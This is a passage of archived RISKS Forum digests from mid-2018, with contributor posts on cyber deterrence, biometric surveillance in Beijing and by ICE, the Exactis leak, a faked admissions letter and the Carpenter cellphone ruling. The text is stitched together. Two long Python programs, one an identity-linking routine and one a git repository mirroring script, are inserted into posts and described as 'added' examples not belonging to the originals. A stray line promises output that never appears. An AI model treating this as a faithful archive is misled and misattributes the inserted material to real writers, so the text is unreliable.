    a shooting war. Cyberattacks have long been hard to stop because determining
    where they come from takes time -- and sometimes the mystery is never
    solved. But even as the United States has gotten better at attributing
    attacks, its responses have failed to keep pace.

    Today cyberattackers believe there is almost no risk that the United States
    or any other power would retaliate with significant sanctions, much less
    bombs, troops or even a counter cyberattack. And though Secretary of Defense
    Jim Mattis has said the United States should be prepared to use nuclear
    weapons to deter a huge non-nuclear attack, including using cyberweapons,
    against its electric grid and other infrastructure, most experts consider
    the threat hollow.

    At his confirmation hearings in March to become director of the N.S.A. and
    commander of the United States Cyber Command, Gen. Paul Nakasone was asked
    whether our adversaries think they will suffer if they strike us with
    cyberweapons. ``They don't fear us,'' General Nakasone replied.

    ------------------------------

    Date: Tue, 19 Jun 2018 14:47:36 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Beijing subways to get bio-ID system (StraitsTimes)

    http://www.straitstimes.com/asia/east-asia/beijing-subways-to-get-bio-id-system

    "BEIJING (CHINA DAILY/ASIA NEWS NETWORK) - The Beijing subway system plans
    to introduce bio-recognition technology at stations this year to improve
    transport efficiency and reduce costs, a senior manager said.

    "Two bio-recognition technologies - facial recognition and palm touch -
    are being considered, said Zhang Huabing, head of enterprise development
    for Beijing Subway, the operator of most lines in the city, during the
    International Metro Transit Exhibition in Beijing last Thursday (June 14).

    "Facial recognition technology can track passenger movements with cameras
    connected to online networks that recognise people when they enter a
    station, potentially allowing them to bypass traditional ticketing."

    A 21st century city needs a 21st century infrastructure. Tracking and
    surveillance of citizens is routine for an authoritarian government. Two
    systems, each keyed to a distinct biometric signature, increase correlation
    potential, and minimize false-positive/false-negative matches. Hope the
    reference compare files are consistent and accurate to avoid "rounding up
    the usual suspects." One step closer to P.K. Dick's "Minority Report"
    panoptic surveillance.

    ------------------------------

    Date: Wed, 13 Jun 2018 19:48:20 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Scanning immigrants old fingerprints, U.S. threatens to strip
    thousands of citizenship (WashPo)

    http://www.washingtonpost.com/world...30d8a2-6f2e-11e8-afd5-778aca903bbe_story.html

    "The report said U.S. Immigration and Customs Enforcement (ICE) has
    315,000 old fingerprint records being digitized and uploaded to the
    Homeland Security IDENT database.

    "Those prints can be compared with those already in the database.
    Foreigners who obtained American citizenship years ago and have been
    otherwise living quietly in the United States could be at risk of a knock
    at their doors."

    Biometrics, like other digital personal identifying information, are
    easy to store and retrieve for comparison purposes, though they can be
    forged (see http://catless.ncl.ac.uk/Risks/30/28#subj5.1)

    Judicial findings against ICE's IDENT DB matches will be difficult to
    overturn until an independent audit discovers a content and/or metadata
    discrepancy that halts expulsions.

    ------------------------------

    Date: Sun, 24 Jun 2018 11:43:36 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: M&A isn't what it used to be (Fortune)

    *Good help is hard to find.* One of the leading cryptocurrency producers,
    *Stellar*, is in talks to acquire *Chain*, the San Francisco-based startup
    building blockchain technology for the financial industry, for $500 million,
    to be paid in in Stellar's digital currency Lumens. The acquisition may be
    motivated more by the need to get Chain's engineering talent rather than its
    products -- a classic acquire, *Fortune* reports.
    http://click.email.fortune.com/?qs=...2e779eea1f42ce349d175d731870ed2c2254f314c2c7c

    I guess I'll create a digital currency, surely my broker will let me invest
    that. I'll mine a couple trillion dollars of it on my spare PC.

    ------------------------------

    Date: Sun, 24 Jun 2018 17:15:01 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: A new way to do big data with entity resolution (Web Informant)

    I have this hope that most of you reading this post aren't criminals, or
    terrorists. So this might be interesting to you, if you want to know how
    they think and carry out their business. Their number one technique is
    called channel separation, the ability to use multiple identities to prevent
    them from being caught.

    Let's say you want to rob a bank, or blow something up. You use one identity
    to rent the getaway car. Another to open an account at the bank. And other
    identities to hire your thugs or whatnot. You get the idea. But in the
    process of creating all these identities, you aren't that clever: you leave
    some bread crumbs or clues that connect them together, as is shown in the
    diagram.

    http://blog.strom.com/wp/?p=6586

    Tradecraft.
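As an added illustration (not code from the Web Informant post or from any product it discusses), here is a small entity-resolution pass over constructed records. Separately used identities are linked whenever they share a normalized phone number, e-mail address or street address, and the shared values are reported as the "bread crumbs" that tie them together. All names, numbers and addresses below are invented.

```python
"""Entity resolution over constructed identity records.

Added example, not code from the Web Informant post. Identities are linked
whenever they share a normalized phone, e-mail or street address; the shared
values are the "bread crumbs" that tie separately used identities together.
"""
import re
from collections import defaultdict

# Constructed sample data (invented names, numbers and addresses).
RECORDS = [
    {"id": "A1", "name": "J. Doe",    "phone": "555-0101",
     "email": "jd@example.invalid", "address": "12 Elm St"},
    {"id": "A2", "name": "John D.",   "phone": "(555) 0199",
     "email": "JD@Example.invalid", "address": "9 Oak Ave"},
    {"id": "A3", "name": "Jon Dough", "phone": "555-0199",
     "email": "rent@example.invalid", "address": "77 Pine Rd"},
    {"id": "B1", "name": "M. Roe",    "phone": "555-0300",
     "email": "mr@example.invalid", "address": "3 Birch Ln"},
]
LINK_FIELDS = ("phone", "email", "address")


def normalize(field, value):
    """Canonicalize a value so cosmetic differences do not hide a match."""
    value = value.strip().lower()
    if field == "phone":
        return re.sub(r"\D", "", value)        # digits only: (555) 0199 == 555-0199
    return re.sub(r"\s+", " ", value)


class UnionFind:
    """Disjoint-set forest; ids sharing any identifier end up in one set."""

    def __init__(self):
        self.parent = {}

    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]   # path halving
            x = self.parent[x]
        return x

    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[rb] = ra


def shared_identifiers(records, fields=LINK_FIELDS):
    """Map each (field, normalized value) used by more than one id to those ids."""
    index = defaultdict(set)
    for rec in records:
        for field in fields:
            value = rec.get(field)
            if value:
                index[(field, normalize(field, value))].add(rec["id"])
    return {key: sorted(ids) for key, ids in index.items() if len(ids) > 1}


def resolve(records, fields=LINK_FIELDS):
    """Cluster identity ids that are transitively linked by shared identifiers."""
    uf = UnionFind()
    for rec in records:
        uf.find(rec["id"])                      # register singletons too
    for ids in shared_identifiers(records, fields).values():
        for other in ids[1:]:
            uf.union(ids[0], other)
    clusters = defaultdict(list)
    for rec in records:
        clusters[uf.find(rec["id"])].append(rec["id"])
    return sorted(sorted(c) for c in clusters.values())


if __name__ == "__main__":
    for (field, value), ids in shared_identifiers(RECORDS).items():
        print(f"{field}={value!r} shared by {ids}")
    print(resolve(RECORDS))
```

On the sample, A1 and A2 are tied by the same e-mail address (differing only in case), A2 and A3 by the same phone number (differing only in punctuation), so A1, A2 and A3 collapse into one cluster while B1 stands alone. The normalization step is what matters in practice: without it, the cosmetic variations above would look like four unrelated people.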

    ------------------------------

    Date: Wed, 20 Jun 2018 21:49:28 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Tesla sues former employee for allegedly stealing gigabytes of data,
    making false claims to media. (CNBC)

    http://www.cnbc.com/2018/06/20/tesl...tes-of-data-making-false-claims-to-media.html

    ------------------------------

    Date: Sun, 24 Jun 2018 11:45:50 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Show me the money (Fortune)

    *Show me the money*. Authors, software developers, and other creators could
    track and collect royalty payments directly using a new blockchain
    technology
    https://click.email.fortune.com/?qs...9bc9d06850a04292bb27cb946de9572d9b3a6b4b7ead4
    announced by *Microsoft* and consulting firm *EY* on Wednesday. "The scale,
    complexity and volume of digital rights and royalties transactions makes
    this a perfect application for blockchains," Paul Brody, EY's global
    innovation leader for blockchain, tells /Fortune/.

    ...because blockchains are so much simpler and better understood.

    ------------------------------

    Date: Thu, 21 Jun 2018 00:19:11 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Visa fingers 'very rare' datacentre switch glitch for payment
    meltdown (The Register)

    Visa has said a `very rare' partial network switch failure in one of its two
    data centres led to the fiasco earlier this month that caused millions of
    transactions in Europe to be declined.

    http://www.theregister.co.uk/2018/0...ems_on_very_rare_fault_in_data_centre_switch/

    Dang those partial failures -- so much worse than total failures.

    ------------------------------

    Date: Tue, 12 Jun 2018 23:30:03 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Recounting Horror Stories? Over Guitar Center's Warranties (NYTimes)

    Former employees and customers at the giant music retailer described
    problems with how it sells protection plans, particularly in Puerto Rico.

    Guitar Center said in a statement for this article that it had been ``made
    aware of an issue with some third-party protection plans that were sold in
    Puerto Rico over the past 30 months.''

    ``We found that -- despite our policies and systems in place --
    approximately 100 transactions including at least a protection plan have
    been made with Puerto Rican addresses.''

    The company said the transactions represented ``a tiny fraction'' of the
    warranties that it sells.

    It blamed a ``glitch in our computer system in 2017 that inadvertently
    allowed orders with Puerto Rican addresses to have protection plans
    processed,'' as well as ``a few employees acting outside of our longstanding
    policy.''

    http://www.nytimes.com/2018/06/07/business/guitar-center-warranty.html

    Yeah, the system did it. That's the ticket, blame the evil system...

    ------------------------------

    Date: Mon, 18 Jun 2018 20:20:21 -0600
    From: "Matthew Kruk" <mkr...@gmail.com>
    Subject: The Guy Who Robbed Someone at Gunpoint for a Domain Name Is Getting
    20 Years in Jail (Motherboard)

    How a meme and a failed armed robbery gave a whole new meaning to 'domain
    hijacking.'
    http://motherboard.vice.com/en_us/article/pavwj8/armed-robbery-domain-website-gunpoint-doitforstate

    ------------------------------

    Date: Sat, 16 Jun 2018 23:31:23 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Clarinetist discovers his ex-girlfriend faked a rejection letter
    from his dream school (The Washington Post)

    By this point, he and his girlfriend had already been broken up for more
    than a year. Even so, it did not occur to him that she could be responsible
    for impersonating him. ``I never would've even considered that the person I
    trusted the most would have done something like this to me.''

But then one of his friends suggested the possibility that his ex-girlfriend
    could be responsible. After all, when they dated, Abramovitz essentially
    lived with her, leaving his computer easily accessible to her. She knew his
    passwords and could have easily logged on to his email.

    In May 2016, Abramovitz and his friend tried logging on to the email account
    that sent the fake rejection letter, gilady...@gmail.com. Abramovitz
    remembered an old password the ex-girlfriend used for Facebook, ``and sure
    enough, we got right in.'' The ex-girlfriend's contact information appeared
    clearly in the email account. The only exchange in the Inbox was the
    rejection letter sent to Abramovitz.

    http://www.washingtonpost.com/news/...ked-a-rejection-letter-from-his-dream-school/

    Yeah, risks...

    ------------------------------

    Date: Mon, 18 Jun 2018 17:52:12 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Internet TV firmware update/soft power-switch failure

    While on vacation near Palm Springs, CA, the home we rented was equipped
    with all manner of internet of mistakes devices, including a Samsung
    SmartTV.

    At 0200 one morning, it switched on suddenly. Apparently, the owners -- out
    of convenience or pure ignorance -- elected for firmware auto-updates.

    The family was startled, as the volume had been boosted by the flash memory
    save and reboot; the legacy off-state was not restored. The line-of-sight TV
    controls remained operative.

    Although the Samsung SmartTV possesses an "Eco Solution" feature that
    auto-detects inactivity after 4 hours, or extended loss of signal, I cannot
help imagining if the upgrade either bricked these soft switches, or it
    possessed a "thermal runaway" virus maliciously designed to ignite the unit.

    ------------------------------

    Date: Thu, 14 Jun 2018 17:26:29 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Ghost Cytometry May Improve Cancer Detection, Enable New Experiments
    (SciAm)

    http://www.scientificamerican.com/a...rove-cancer-detection-enable-new-experiments/

    A fascinating discussion on a new cell sorting technique to
    characterize morphology -- shape and type -- for disease detection.

    They tweaked the typical cytometry setup and added a single-pixel detector
-- a camera that images one pixel at a time rather than thousands at once
    -- creating a device that can generate a unique signature for
    fluorescently labeled cells based on the light they emit. Essentially this
    approach produces a ghost depiction of a cell's structure, an identifiable
    pseudo-image based on the activated light particles.

    A machine-learning algorithm then uses these ghost images to categorize
    the cells in real time, and another device sorts the incoming cells into
    separate compartments.

    Although some flow cytometers have been able to image cells for several
    years, ``this is the first instrument that allows the physical sorting of
    cells based on their morphology,'' Anne Carpenter, a computational
    biologist at the Broad Institute of MIT and Harvard who was not involved
    in the work, wrote in an e-mail. ``This is revolutionary.''

    No mention of the learning algorithm training regimen -- possibly steepest
    descent, and the potential to get trapped at a false optimization point.

    One needs to ask what the certification/license requirements are to market
    this device. Do the certification requirements mirror that for embedded
    medical devices, where a manufacturer only has to show "similarity" to
    legacy equivalent products, and skip random control trials?

    ------------------------------

    Date: Mon, 18 Jun 2018 17:27:00 -0700
    From: Rob Slade <rms...@shaw.ca>
    Subject: Creating bizarre interfaces

    It used to be called human-factors engineering when I went to school.
    Making sure that the system was as obvious and transparent as possible for
    the user.

    Since somewhat prior to the assassination of the CISSPforum by ISC2 (no, I'm
    not bitter. Why do you ask?), I've been exploring the interface for the new
    "community." One of the topics has been "labels," and particularly
    searching for labels.

    http://community.isc2.org/t5/Custom...-difference-between-labels-and-tags/m-p/11584 or
    http://is.gd/jgVt7

    SamanthaO_isc2 has been helpful, and wrote:

    "I wanted to provide an update to you about searching and labels. We have
    enabled a filter for labels on the search page. While this does not allow
    you to search for labels directly, here is where you can see the various
    labels used throughout the Community, and filter results by certain labels."

    I couldn't find what she was talking about. So she posted a screen shot
    which showed that you could search on location ("board"), label, author,
    date, metadata, type of post, and contents with a series of buttons or drop
    downs. But these didn't show up when I went to the search page, so *I*
    posted a screen shot, showing that the buttons weren't there.

    And then denbesten posted:

    "If my window is 27cm wide, it looks like @rslade's screenshot. If 28cm, it
    looks like @SamanthaO_isc2's."

    He's right. (Well, pretty much right: the measurement on my screen seems
    slightly less, so I think it has to do with pixels, but ...) That *never*
    would have occurred to me.

    Given the lack of privacy (see
http://catless.ncl.ac.uk/Risks/30/71#subj23), you can test it out
    for yourself at
    http://community.isc2.org/t5/forums/searchpage/tab/message

    Of course, now that it's been pointed out, I can see that you might want to
    reduce the complexity of the screen for mobile devices. But you might want
    to do it in such a way that it was obvious something was hidden or missing.

    I think I'll go back to researching security implications of quantum
    computing. It's simpler ...

    (So, if I put the window in the top left corner of the screen does it change
    languages?)

    ------------------------------

    Date: Thu, 14 Jun 2018 13:42:39 -0400
    From: Tony Harminc <thar...@gmail.com>
    Subject: More dodgy numbers - LinkedIn this time

    LinkedIn shows my age (for advertising purposes) as 55-2147483647.

    They are not wrong.

    ------------------------------

    Date: Thu, 21 Jun 2018 09:28:23 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Maybe they'll accept postcard calls for help

    *This is a message from Fairfax Alerts*

    Verizon Wireless is experiencing an outage affecting 9-1-1 and ten-digit
    dialing. Fairfax County residents can text 9-1-1 from a Verizon phone as an
    alternate.

    ------------------------------

    Date: Thu, 21 Jun 2018 22:16:06 -0400
    From: Ed Ravin <era...@panix.com>
    Subject: Re: Another risk of driverless cars (PGN, RISKS-30.72)

    You don't need to drive to an area without coverage to give your cell phone
    a denial-of-service attack -- cell service is subject to many other modes of
    interference. For example, the Evanston, Illinois incident described in
    RISKS-29.88, where a faulty neon sign power supply emitted RF signals
    sufficient to block cell service in the immediate area (and also block car
    owners from using their wireless dongles, which is what made that item
    RISKS-worthy). Stingray-style devices can also target individual phones (or
    vehicles with built-in phones) and block or corrupt their outgoing calls.

    I'm looking forward to the presentation at Black Hat 2025, where researchers
    will show how to subvert every current model of driverless vehicle with a
    combination of wireless network attacks, cell phone interference to block
    the remote emergency "driver", LIDAR attacks like those described in
    http://eprint.iacr.org/2017/613 and spoofed law-enforcement overrides.
    It's going to be such a mess we're going to need a new name for it, maybe
    "the Internet of Things, on wheels".

    ------------------------------

    Date: Wed, 13 Jun 2018 14:36:29 +0100
    From: "Wol's lists" <antl...@youngman.org.uk>
    Subject: Re: Microsoft, Github, & distributed revision control (Ohno)

    This completely misunderstands what git and github are - the whole point of
    git is that every developer has an identical copy of the source
    repository. "Migrating away" in this sense is as simple as creating an
    account on another central service and doing a push.

    The problem is that Github does a lot more than just host your program - it
    provides all the infrastructure behind it like bug tracking, enhancement
    requests, communications forum etc. THIS is value-add which git does not
    provide, and THIS is what is not easy to migrate from one central service to
    another.
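As an added example (not code from the original reply, nor from git or GitHub), the migration described above done end to end in a scratch directory. It assumes only that `git` is on PATH; one bare repository stands in for the old host and another for the new one, and the script checks that every ref arrived.

```python
"""Mirror a git repository from one hosting service to another and verify it.

Added example, not code from the original reply or from GitHub. It assumes
only that `git` is on PATH; two bare repositories in a temporary directory
stand in for the old and the new central service.
"""
import subprocess
import tempfile
from pathlib import Path


def git(*args, cwd):
    """Run one git command, fail loudly, return stripped stdout."""
    done = subprocess.run(["git", *args], cwd=str(cwd), check=True,
                          capture_output=True, text=True)
    return done.stdout.strip()


def make_origin(root):
    """Bare repo holding one commit and one tag: the 'old host'."""
    work = root / "work"
    work.mkdir()
    git("init", "-q", cwd=work)
    git("symbolic-ref", "HEAD", "refs/heads/main", cwd=work)
    (work / "README").write_text("hello\n")
    git("add", "README", cwd=work)
    git("-c", "user.name=Example", "-c", "user.email=dev@example.invalid",
        "commit", "-q", "-m", "initial", cwd=work)
    git("tag", "v1", cwd=work)
    origin = root / "old-host.git"
    git("init", "-q", "--bare", str(origin), cwd=root)
    git("push", "-q", "--mirror", str(origin), cwd=work)
    return origin


def refs(repo):
    """Every ref in a repository with the object it points to, sorted."""
    out = git("for-each-ref", "--format=%(refname) %(objectname)", cwd=repo)
    return sorted(out.splitlines())


def migrate(origin, new_host):
    """Clone the old host with --mirror and push every ref to the new host.

    Returns True when the two hosts end up with identical refs.
    """
    git("init", "-q", "--bare", str(new_host), cwd=new_host.parent)
    mirror = new_host.parent / "mirror.git"
    git("clone", "-q", "--mirror", str(origin), str(mirror), cwd=new_host.parent)
    git("push", "-q", "--mirror", str(new_host), cwd=mirror)
    return refs(origin) == refs(new_host)


def demo():
    """Run the whole migration in a scratch directory; return (ok, refs)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        origin = make_origin(root)
        ok = migrate(origin, root / "new-host.git")
        return ok, refs(origin)


if __name__ == "__main__":
    ok, moved = demo()
    print("all refs migrated:", ok)
    for line in moved:
        print(" ", line)
```

`clone --mirror` followed by `push --mirror` carries every branch and tag, and the comparison of `for-each-ref` output is the check that nothing was left behind. What it does not carry is exactly what the reply's second paragraph points at: issues, enhancement requests and forum history live in the host's own database, not in any ref, so no amount of pushing moves them.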

    ------------------------------

    Date: [lost]
    From: R A Lichtensteiger <ri...@throwawaydomain.com>
    Subject: Re: Florida skips gun background checks for a year after employee
    forgets login (Goldberg, RISKS-30.82)

    This blog post is incorrect and misleading.

    The Florida Department of Agriculture Licensing department did, in fact,
    perform the required background checks on applicants for licenses to carry
    concealed weapons or firearms. According to later news reports checks were
    done through FCIC (Florida Criminal Information Computer system) and NCIC
    (National Criminal Information Computer system -- the national FBI
    fingerprint data base) and they also did a NICS check (National Instant
    Check System), which is the name-based background check system.

    What did NOT happen was that 365 applications where the background check
    flagged one or more disqualifiers were not immediately rejected. That is a
    problem. But it is NOT the same problem as claiming that the checks weren't
    done. It's also 0.001% of the applications processed during that time
    period.

    It should also be noted that this was on LICENSE APPLICATIONS, not purchases
    of firearms. So 365 people who shouldn't have gotten licenses did. When
    the failure was discovered, those 365 licenses were reviewed (as they should
    have been initially). 74 were cleared and 291 still had disqualifiers.

    As a final observation, the same NICS check that was part of the background
    check for the application is done, per federal law, at EVERY sale at a gun
dealer, so any PURCHASES by these people would have been flagged by ATF and
    denied.

    http://www.orlandoweekly.com/Blogs/...ams-office-failed-to-review-background-checks

    The risks? Myriad

    1) Relying on a cybersecurity blog for mainstream news
    2) Rushing to be the first one to post on Risks and not
    waiting until the facts were reported.
    3) Drawing Risks into US gun politics.

    ------------------------------

    Date: Wed, 13 Jun 2018 13:40:59 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Re: Florida skips gun background checks for a year after employee
    forgets login (Lichtensteiger)

    0. Thanks for your response.
    1. Often cybersecurity blogs are only place reporting cybersecurity
    risks -- at first, or (sometimes) ever.
    2. Ditto. Posting isn't "rushing", it's reporting on what's been seen.
    Then come responses.
    3. Rather than related to gun politics, this was reported as a forgotten
    password issue. It could have been a state DMV or NRA. It happened to be
    related to firearms -- but that doesn't make it off topic/limits.

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.73
    ************************
     
    Risks Digest 30.74

    RISKS List Owner

    Jul 5, 2018 3:12 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Thursday 5 July 2018 Volume 30 : Issue 74

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Cyber-researchers Don't Think Feds or Congress Can Protect Against
    Cyberattacks (Defense One)
    Babylon claims its chatbot beats GPs at medical exam (bbc.com)
    Medical device security: Hacking prevention measures (HPE)
    Exactis said to expose 340-million records, more than Equifax breach (CNET)
    Supreme Court requires warrant for cellphone location data (Henry Baker)
    ICE hacked its algorithmic risk-assessment tool, so it recommended
    detention for everyone (BoingBoing)
    Energy company vulnerability allows access to customer accounts
    (Donald Mackie)
    Internet TV firmware update/soft powerswitch failure (Richard M Stein)
    Widespread Google Home outage: What NOT to do! (Lauren Weinstein)
    Cruel pranksters made NYC Internet kiosks play ice-cream truck tunes
    (Engadget)
    Swann home security camera sends video to wrong user (BBC)
    Hidden Microsoft Office 365 data gathering (LMG Security)
    Protecting civilians in cyberspace (Just Security)
    Rash of Fortnite cheaters infected by malware that breaks HTTPS
    encryption (Ars Technica)
    Really dumb malware targets cryptocurrency fans using Macs (Ars Technica)
    Sony Blunders By Uploading Full Movie to YouTube Instead of Trailer
    (TorrentFreak)
    Homeland Security subpoenas Twitter for data breach finder's account
    (Zack Whittaker)
    Wikipedia Italy Blocks All Articles in Protest of EU's Ruinous
    Copyright Proposals (Gizmodo)
    How a Major Computer Crash Showed the Vulnerabilities of EHRs (Medscape
    via Fr. Stevan Bauman)
    Apple 'Family Sharing' feature used by scammers to make purchases
    with hacked Apple IDs (Business Insider)
    ``Trump administration tells FCC to block China Mobile from U.S.''
    (Corinne Reichert)
    Google is training machines to predict when a patient will die
    (Los Angeles Times)
    So What The Heck Does 5G Actually Do? And Is It Worth What The Carriers
    Are Demanding? (Harold Fel)
    Leaks, riots, and monocles: How a $60 in-game item almost destroyed
    EVE Online (Ars Technica)
    Gaming disorder is only a symptom of a much larger problem (WaPo)
    Ticketmaster: How not to manage customers after a data breach.
    (Michael Kent)
    Re: Police, Law Enforcement, and corporate use of facial recognition
    and facial images in court (Kelly Bert Manning)
    Re: Florida skips gun background checks for a year after employee
    (Kelly Bert Manning)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Wed, 27 Jun 2018 20:52:12 PDT
    From: Peter G Neumann <neu...@csl.sri.com>
    Subject: Cyber-researchers Don't Think Feds or Congress Can Protect Against
    Cyberattacks (Defense One)

    Cyber Researchers Don’t Think Feds or Congress Can Protect Against Cyberattacks

    Quite evidently, the U.S. government has little clue about defending itself
    against cybersecurity attacks, and is consequently unprepared for any
    digital disasters.

    ------------------------------

    Date: Sat, 30 Jun 2018 10:28:47 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Babylon claims its chatbot beats GPs at medical exam (bbc.com)

    [od -c output attached for peace of mind]

    Chatbot claims to beat GPs at medical exam

    ``Claims that a chatbot can diagnose medical conditions as accurately as a
    GP have sparked a row between the software's creators and UK doctors.''

    Babylon's chatbot claims to out-achieve carbon-based physicians on the
    UK MRCGP (Membership Royal College of General Practitioners)
    examination. Babylon advocates their AI platform to complement a
    physician's judgment, not as a wholesale replacement.

    ``Babylon said that the first time its AI sat the exam, it achieved a
    score of 81%. It added that the average mark for human doctors was 72%,
    based on results logged between 2012 and 2017. But the RCGP said it had
    not provided Babylon with the test's questions and had no way to verify
    the claim.''

    Given commercial aspirations, and the skyward trajectory of health care
    service delivery, an attempt to capitalize on a ``cost-effective'' AI-based
    alternative is likely. Favorable legislation, and weak regulatory oversight,
    will induce businesses to pursue them despite potential public health risks.

    A randomized control trial must be performed. Any business that promotes and
    sells these AI diagnosis/treatment services must be required to enroll their
    own employees and immediate family members as participants. The trial
    outcome reviewers must be free from conflict of interest.

    ------------------------------

    Date: Mon, 2 Jul 2018 15:37:04 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Medical device security: Hacking prevention measures (HPE)

    With so many lives at stake, computer scientists and healthcare IT pros are
    motivated to develop strategies that keep patients safe from medical device
    hackers. They're making progress.

    Medical device security: Hacking prevention measures

    ------------------------------

    Date: Wed, 27 Jun 2018 18:50:14 -0400
    From: Richard Forno <rfo...@infowarrior.org>
    Subject: Exactis said to expose 340-million records, more than Equifax breach
    (CNET)

    Exactis said to have exposed 340 million records in massive leak

    We hadn't heard of the firm either, but it had data on hundreds of millions
    of Americans and businesses and leaked it, according to Wired.

    Abrar Al-Heeti
    June 27, 2018 2:14 PM PDT

    If you're a US citizen, your personal information -- your phone number, home
    address, email address, even how many children you have -- may have just
    become easily available to hackers in an alleged massive data leak.

    Florida-based marketing and data aggregation firm Exactis exposed a database
    containing nearly 340 million individual records on a publicly accessible
    server, Wired reported. Earlier this month, security researcher Vinny Troia
    found that nearly 2 terabytes of data was exposed, which seems to include
    personal information on hundreds of millions of US adults and millions of
    businesses, the report said.

    ``It seems like this is a database with pretty much every US citizen in it,''
    Troia told Wired.

    Exactis didn't immediately respond to a request for comment or confirmation.

    The alleged breach reportedly exposed highly personal information, such as
    people's phone numbers, home and email addresses, interests and the number,
    age and gender of their children. Credit card information and Social
    Security numbers don't appear to have been leaked. Troia told Wired that he
    doesn't know where the data is coming from, ``but it's one of the most
    comprehensive collections I've ever seen.''

    Because Exactis hasn't confirmed the leak, it's hard to know exactly how
    many people are affected. But Troia found two versions of the database that
    each had around 340 million records, with roughly 230 million on consumers
    and 110 million on business contacts, according to Wired. Exactis says on
    its website that it has over 3.5 billion consumer, business and digital
    records.

    The data leak is noteworthy not only for its breadth, but also for the depth
    of information the records have on people. Every record reportedly has
    entries that include more than 400 variables on characteristics like whether
    the person smokes, what their religion is and whether they have dogs or
    cats. But Wired noted that in some instances, the information is inaccurate
    or outdated.

    Just because people's financial information or Social Security numbers
    weren't leaked doesn't mean they're not at risk for identity theft. The
    amount of personal information that was exposed could still help scammers
    impersonate or profile them.

    Huge compromises to personal information have been making headlines
    lately. In 2017, Equifax was involved in a massive data breach of 145.5
    million people's data. And in October, Yahoo revealed that all 3 billion
    accounts were hacked in a 2013 breach.

    ------------------------------

    Date: Mon, 25 Jun 2018 07:09:23 -0700
    From: Henry Baker <hba...@pipeline.com>
    Subject: Supreme Court requires warrant for cellphone location data

    Nice to see that the ``Third Party Doctrine'' -- which gave the govt ``most
    favored nation status'' w.r.t. your data -- is finally being chipped away.

    However, as this law professor points out, this decision will have little
    practical effect.

    [Sorry for the length of this posting, but every point is salient.]

    The latest Supreme Court decision is being hailed as a big victory for
    digital privacy. It's not.

    Carpenter forces police to get a warrant before getting some cellphone
    data. But other Fourth Amendment cases will undermine its impact.

    By Aziz Huq Updated Jun 23, 2018, 7:43am EDT

    Congratulations -- a closely divided US Supreme Court has just ruled in
    Carpenter v. United States that you have a constitutional right to privacy
    in the locational records produced by your cellphone use. Law enforcement
    now cannot ask Sprint, AT&T, or Verizon, for cell tower records that reveal
    your whereabouts through your phone's interaction with those towers, at
    least without a warrant.

    Carpenter builds on two earlier decisions. In 2011, the Court required a
    warrant before police placed a GPS tracker on a vehicle to track its
    movements. In 2014, it forbade warrantless searches of cellphones during
    arrests. Whatever its other flaws, the Roberts Court thus seems to
    understand electronic privacy's importance.

    But there are a couple of things to know before toasting the Court's high
    regard for privacy in the digital age. The Roberts Court, building on what
    the preceding Rehnquist Court did, has created an infrastructure for Fourth
    Amendment law that makes it exceptionally easy for police to do a search,
    even when a warrant is required. The law also makes it exceptionally
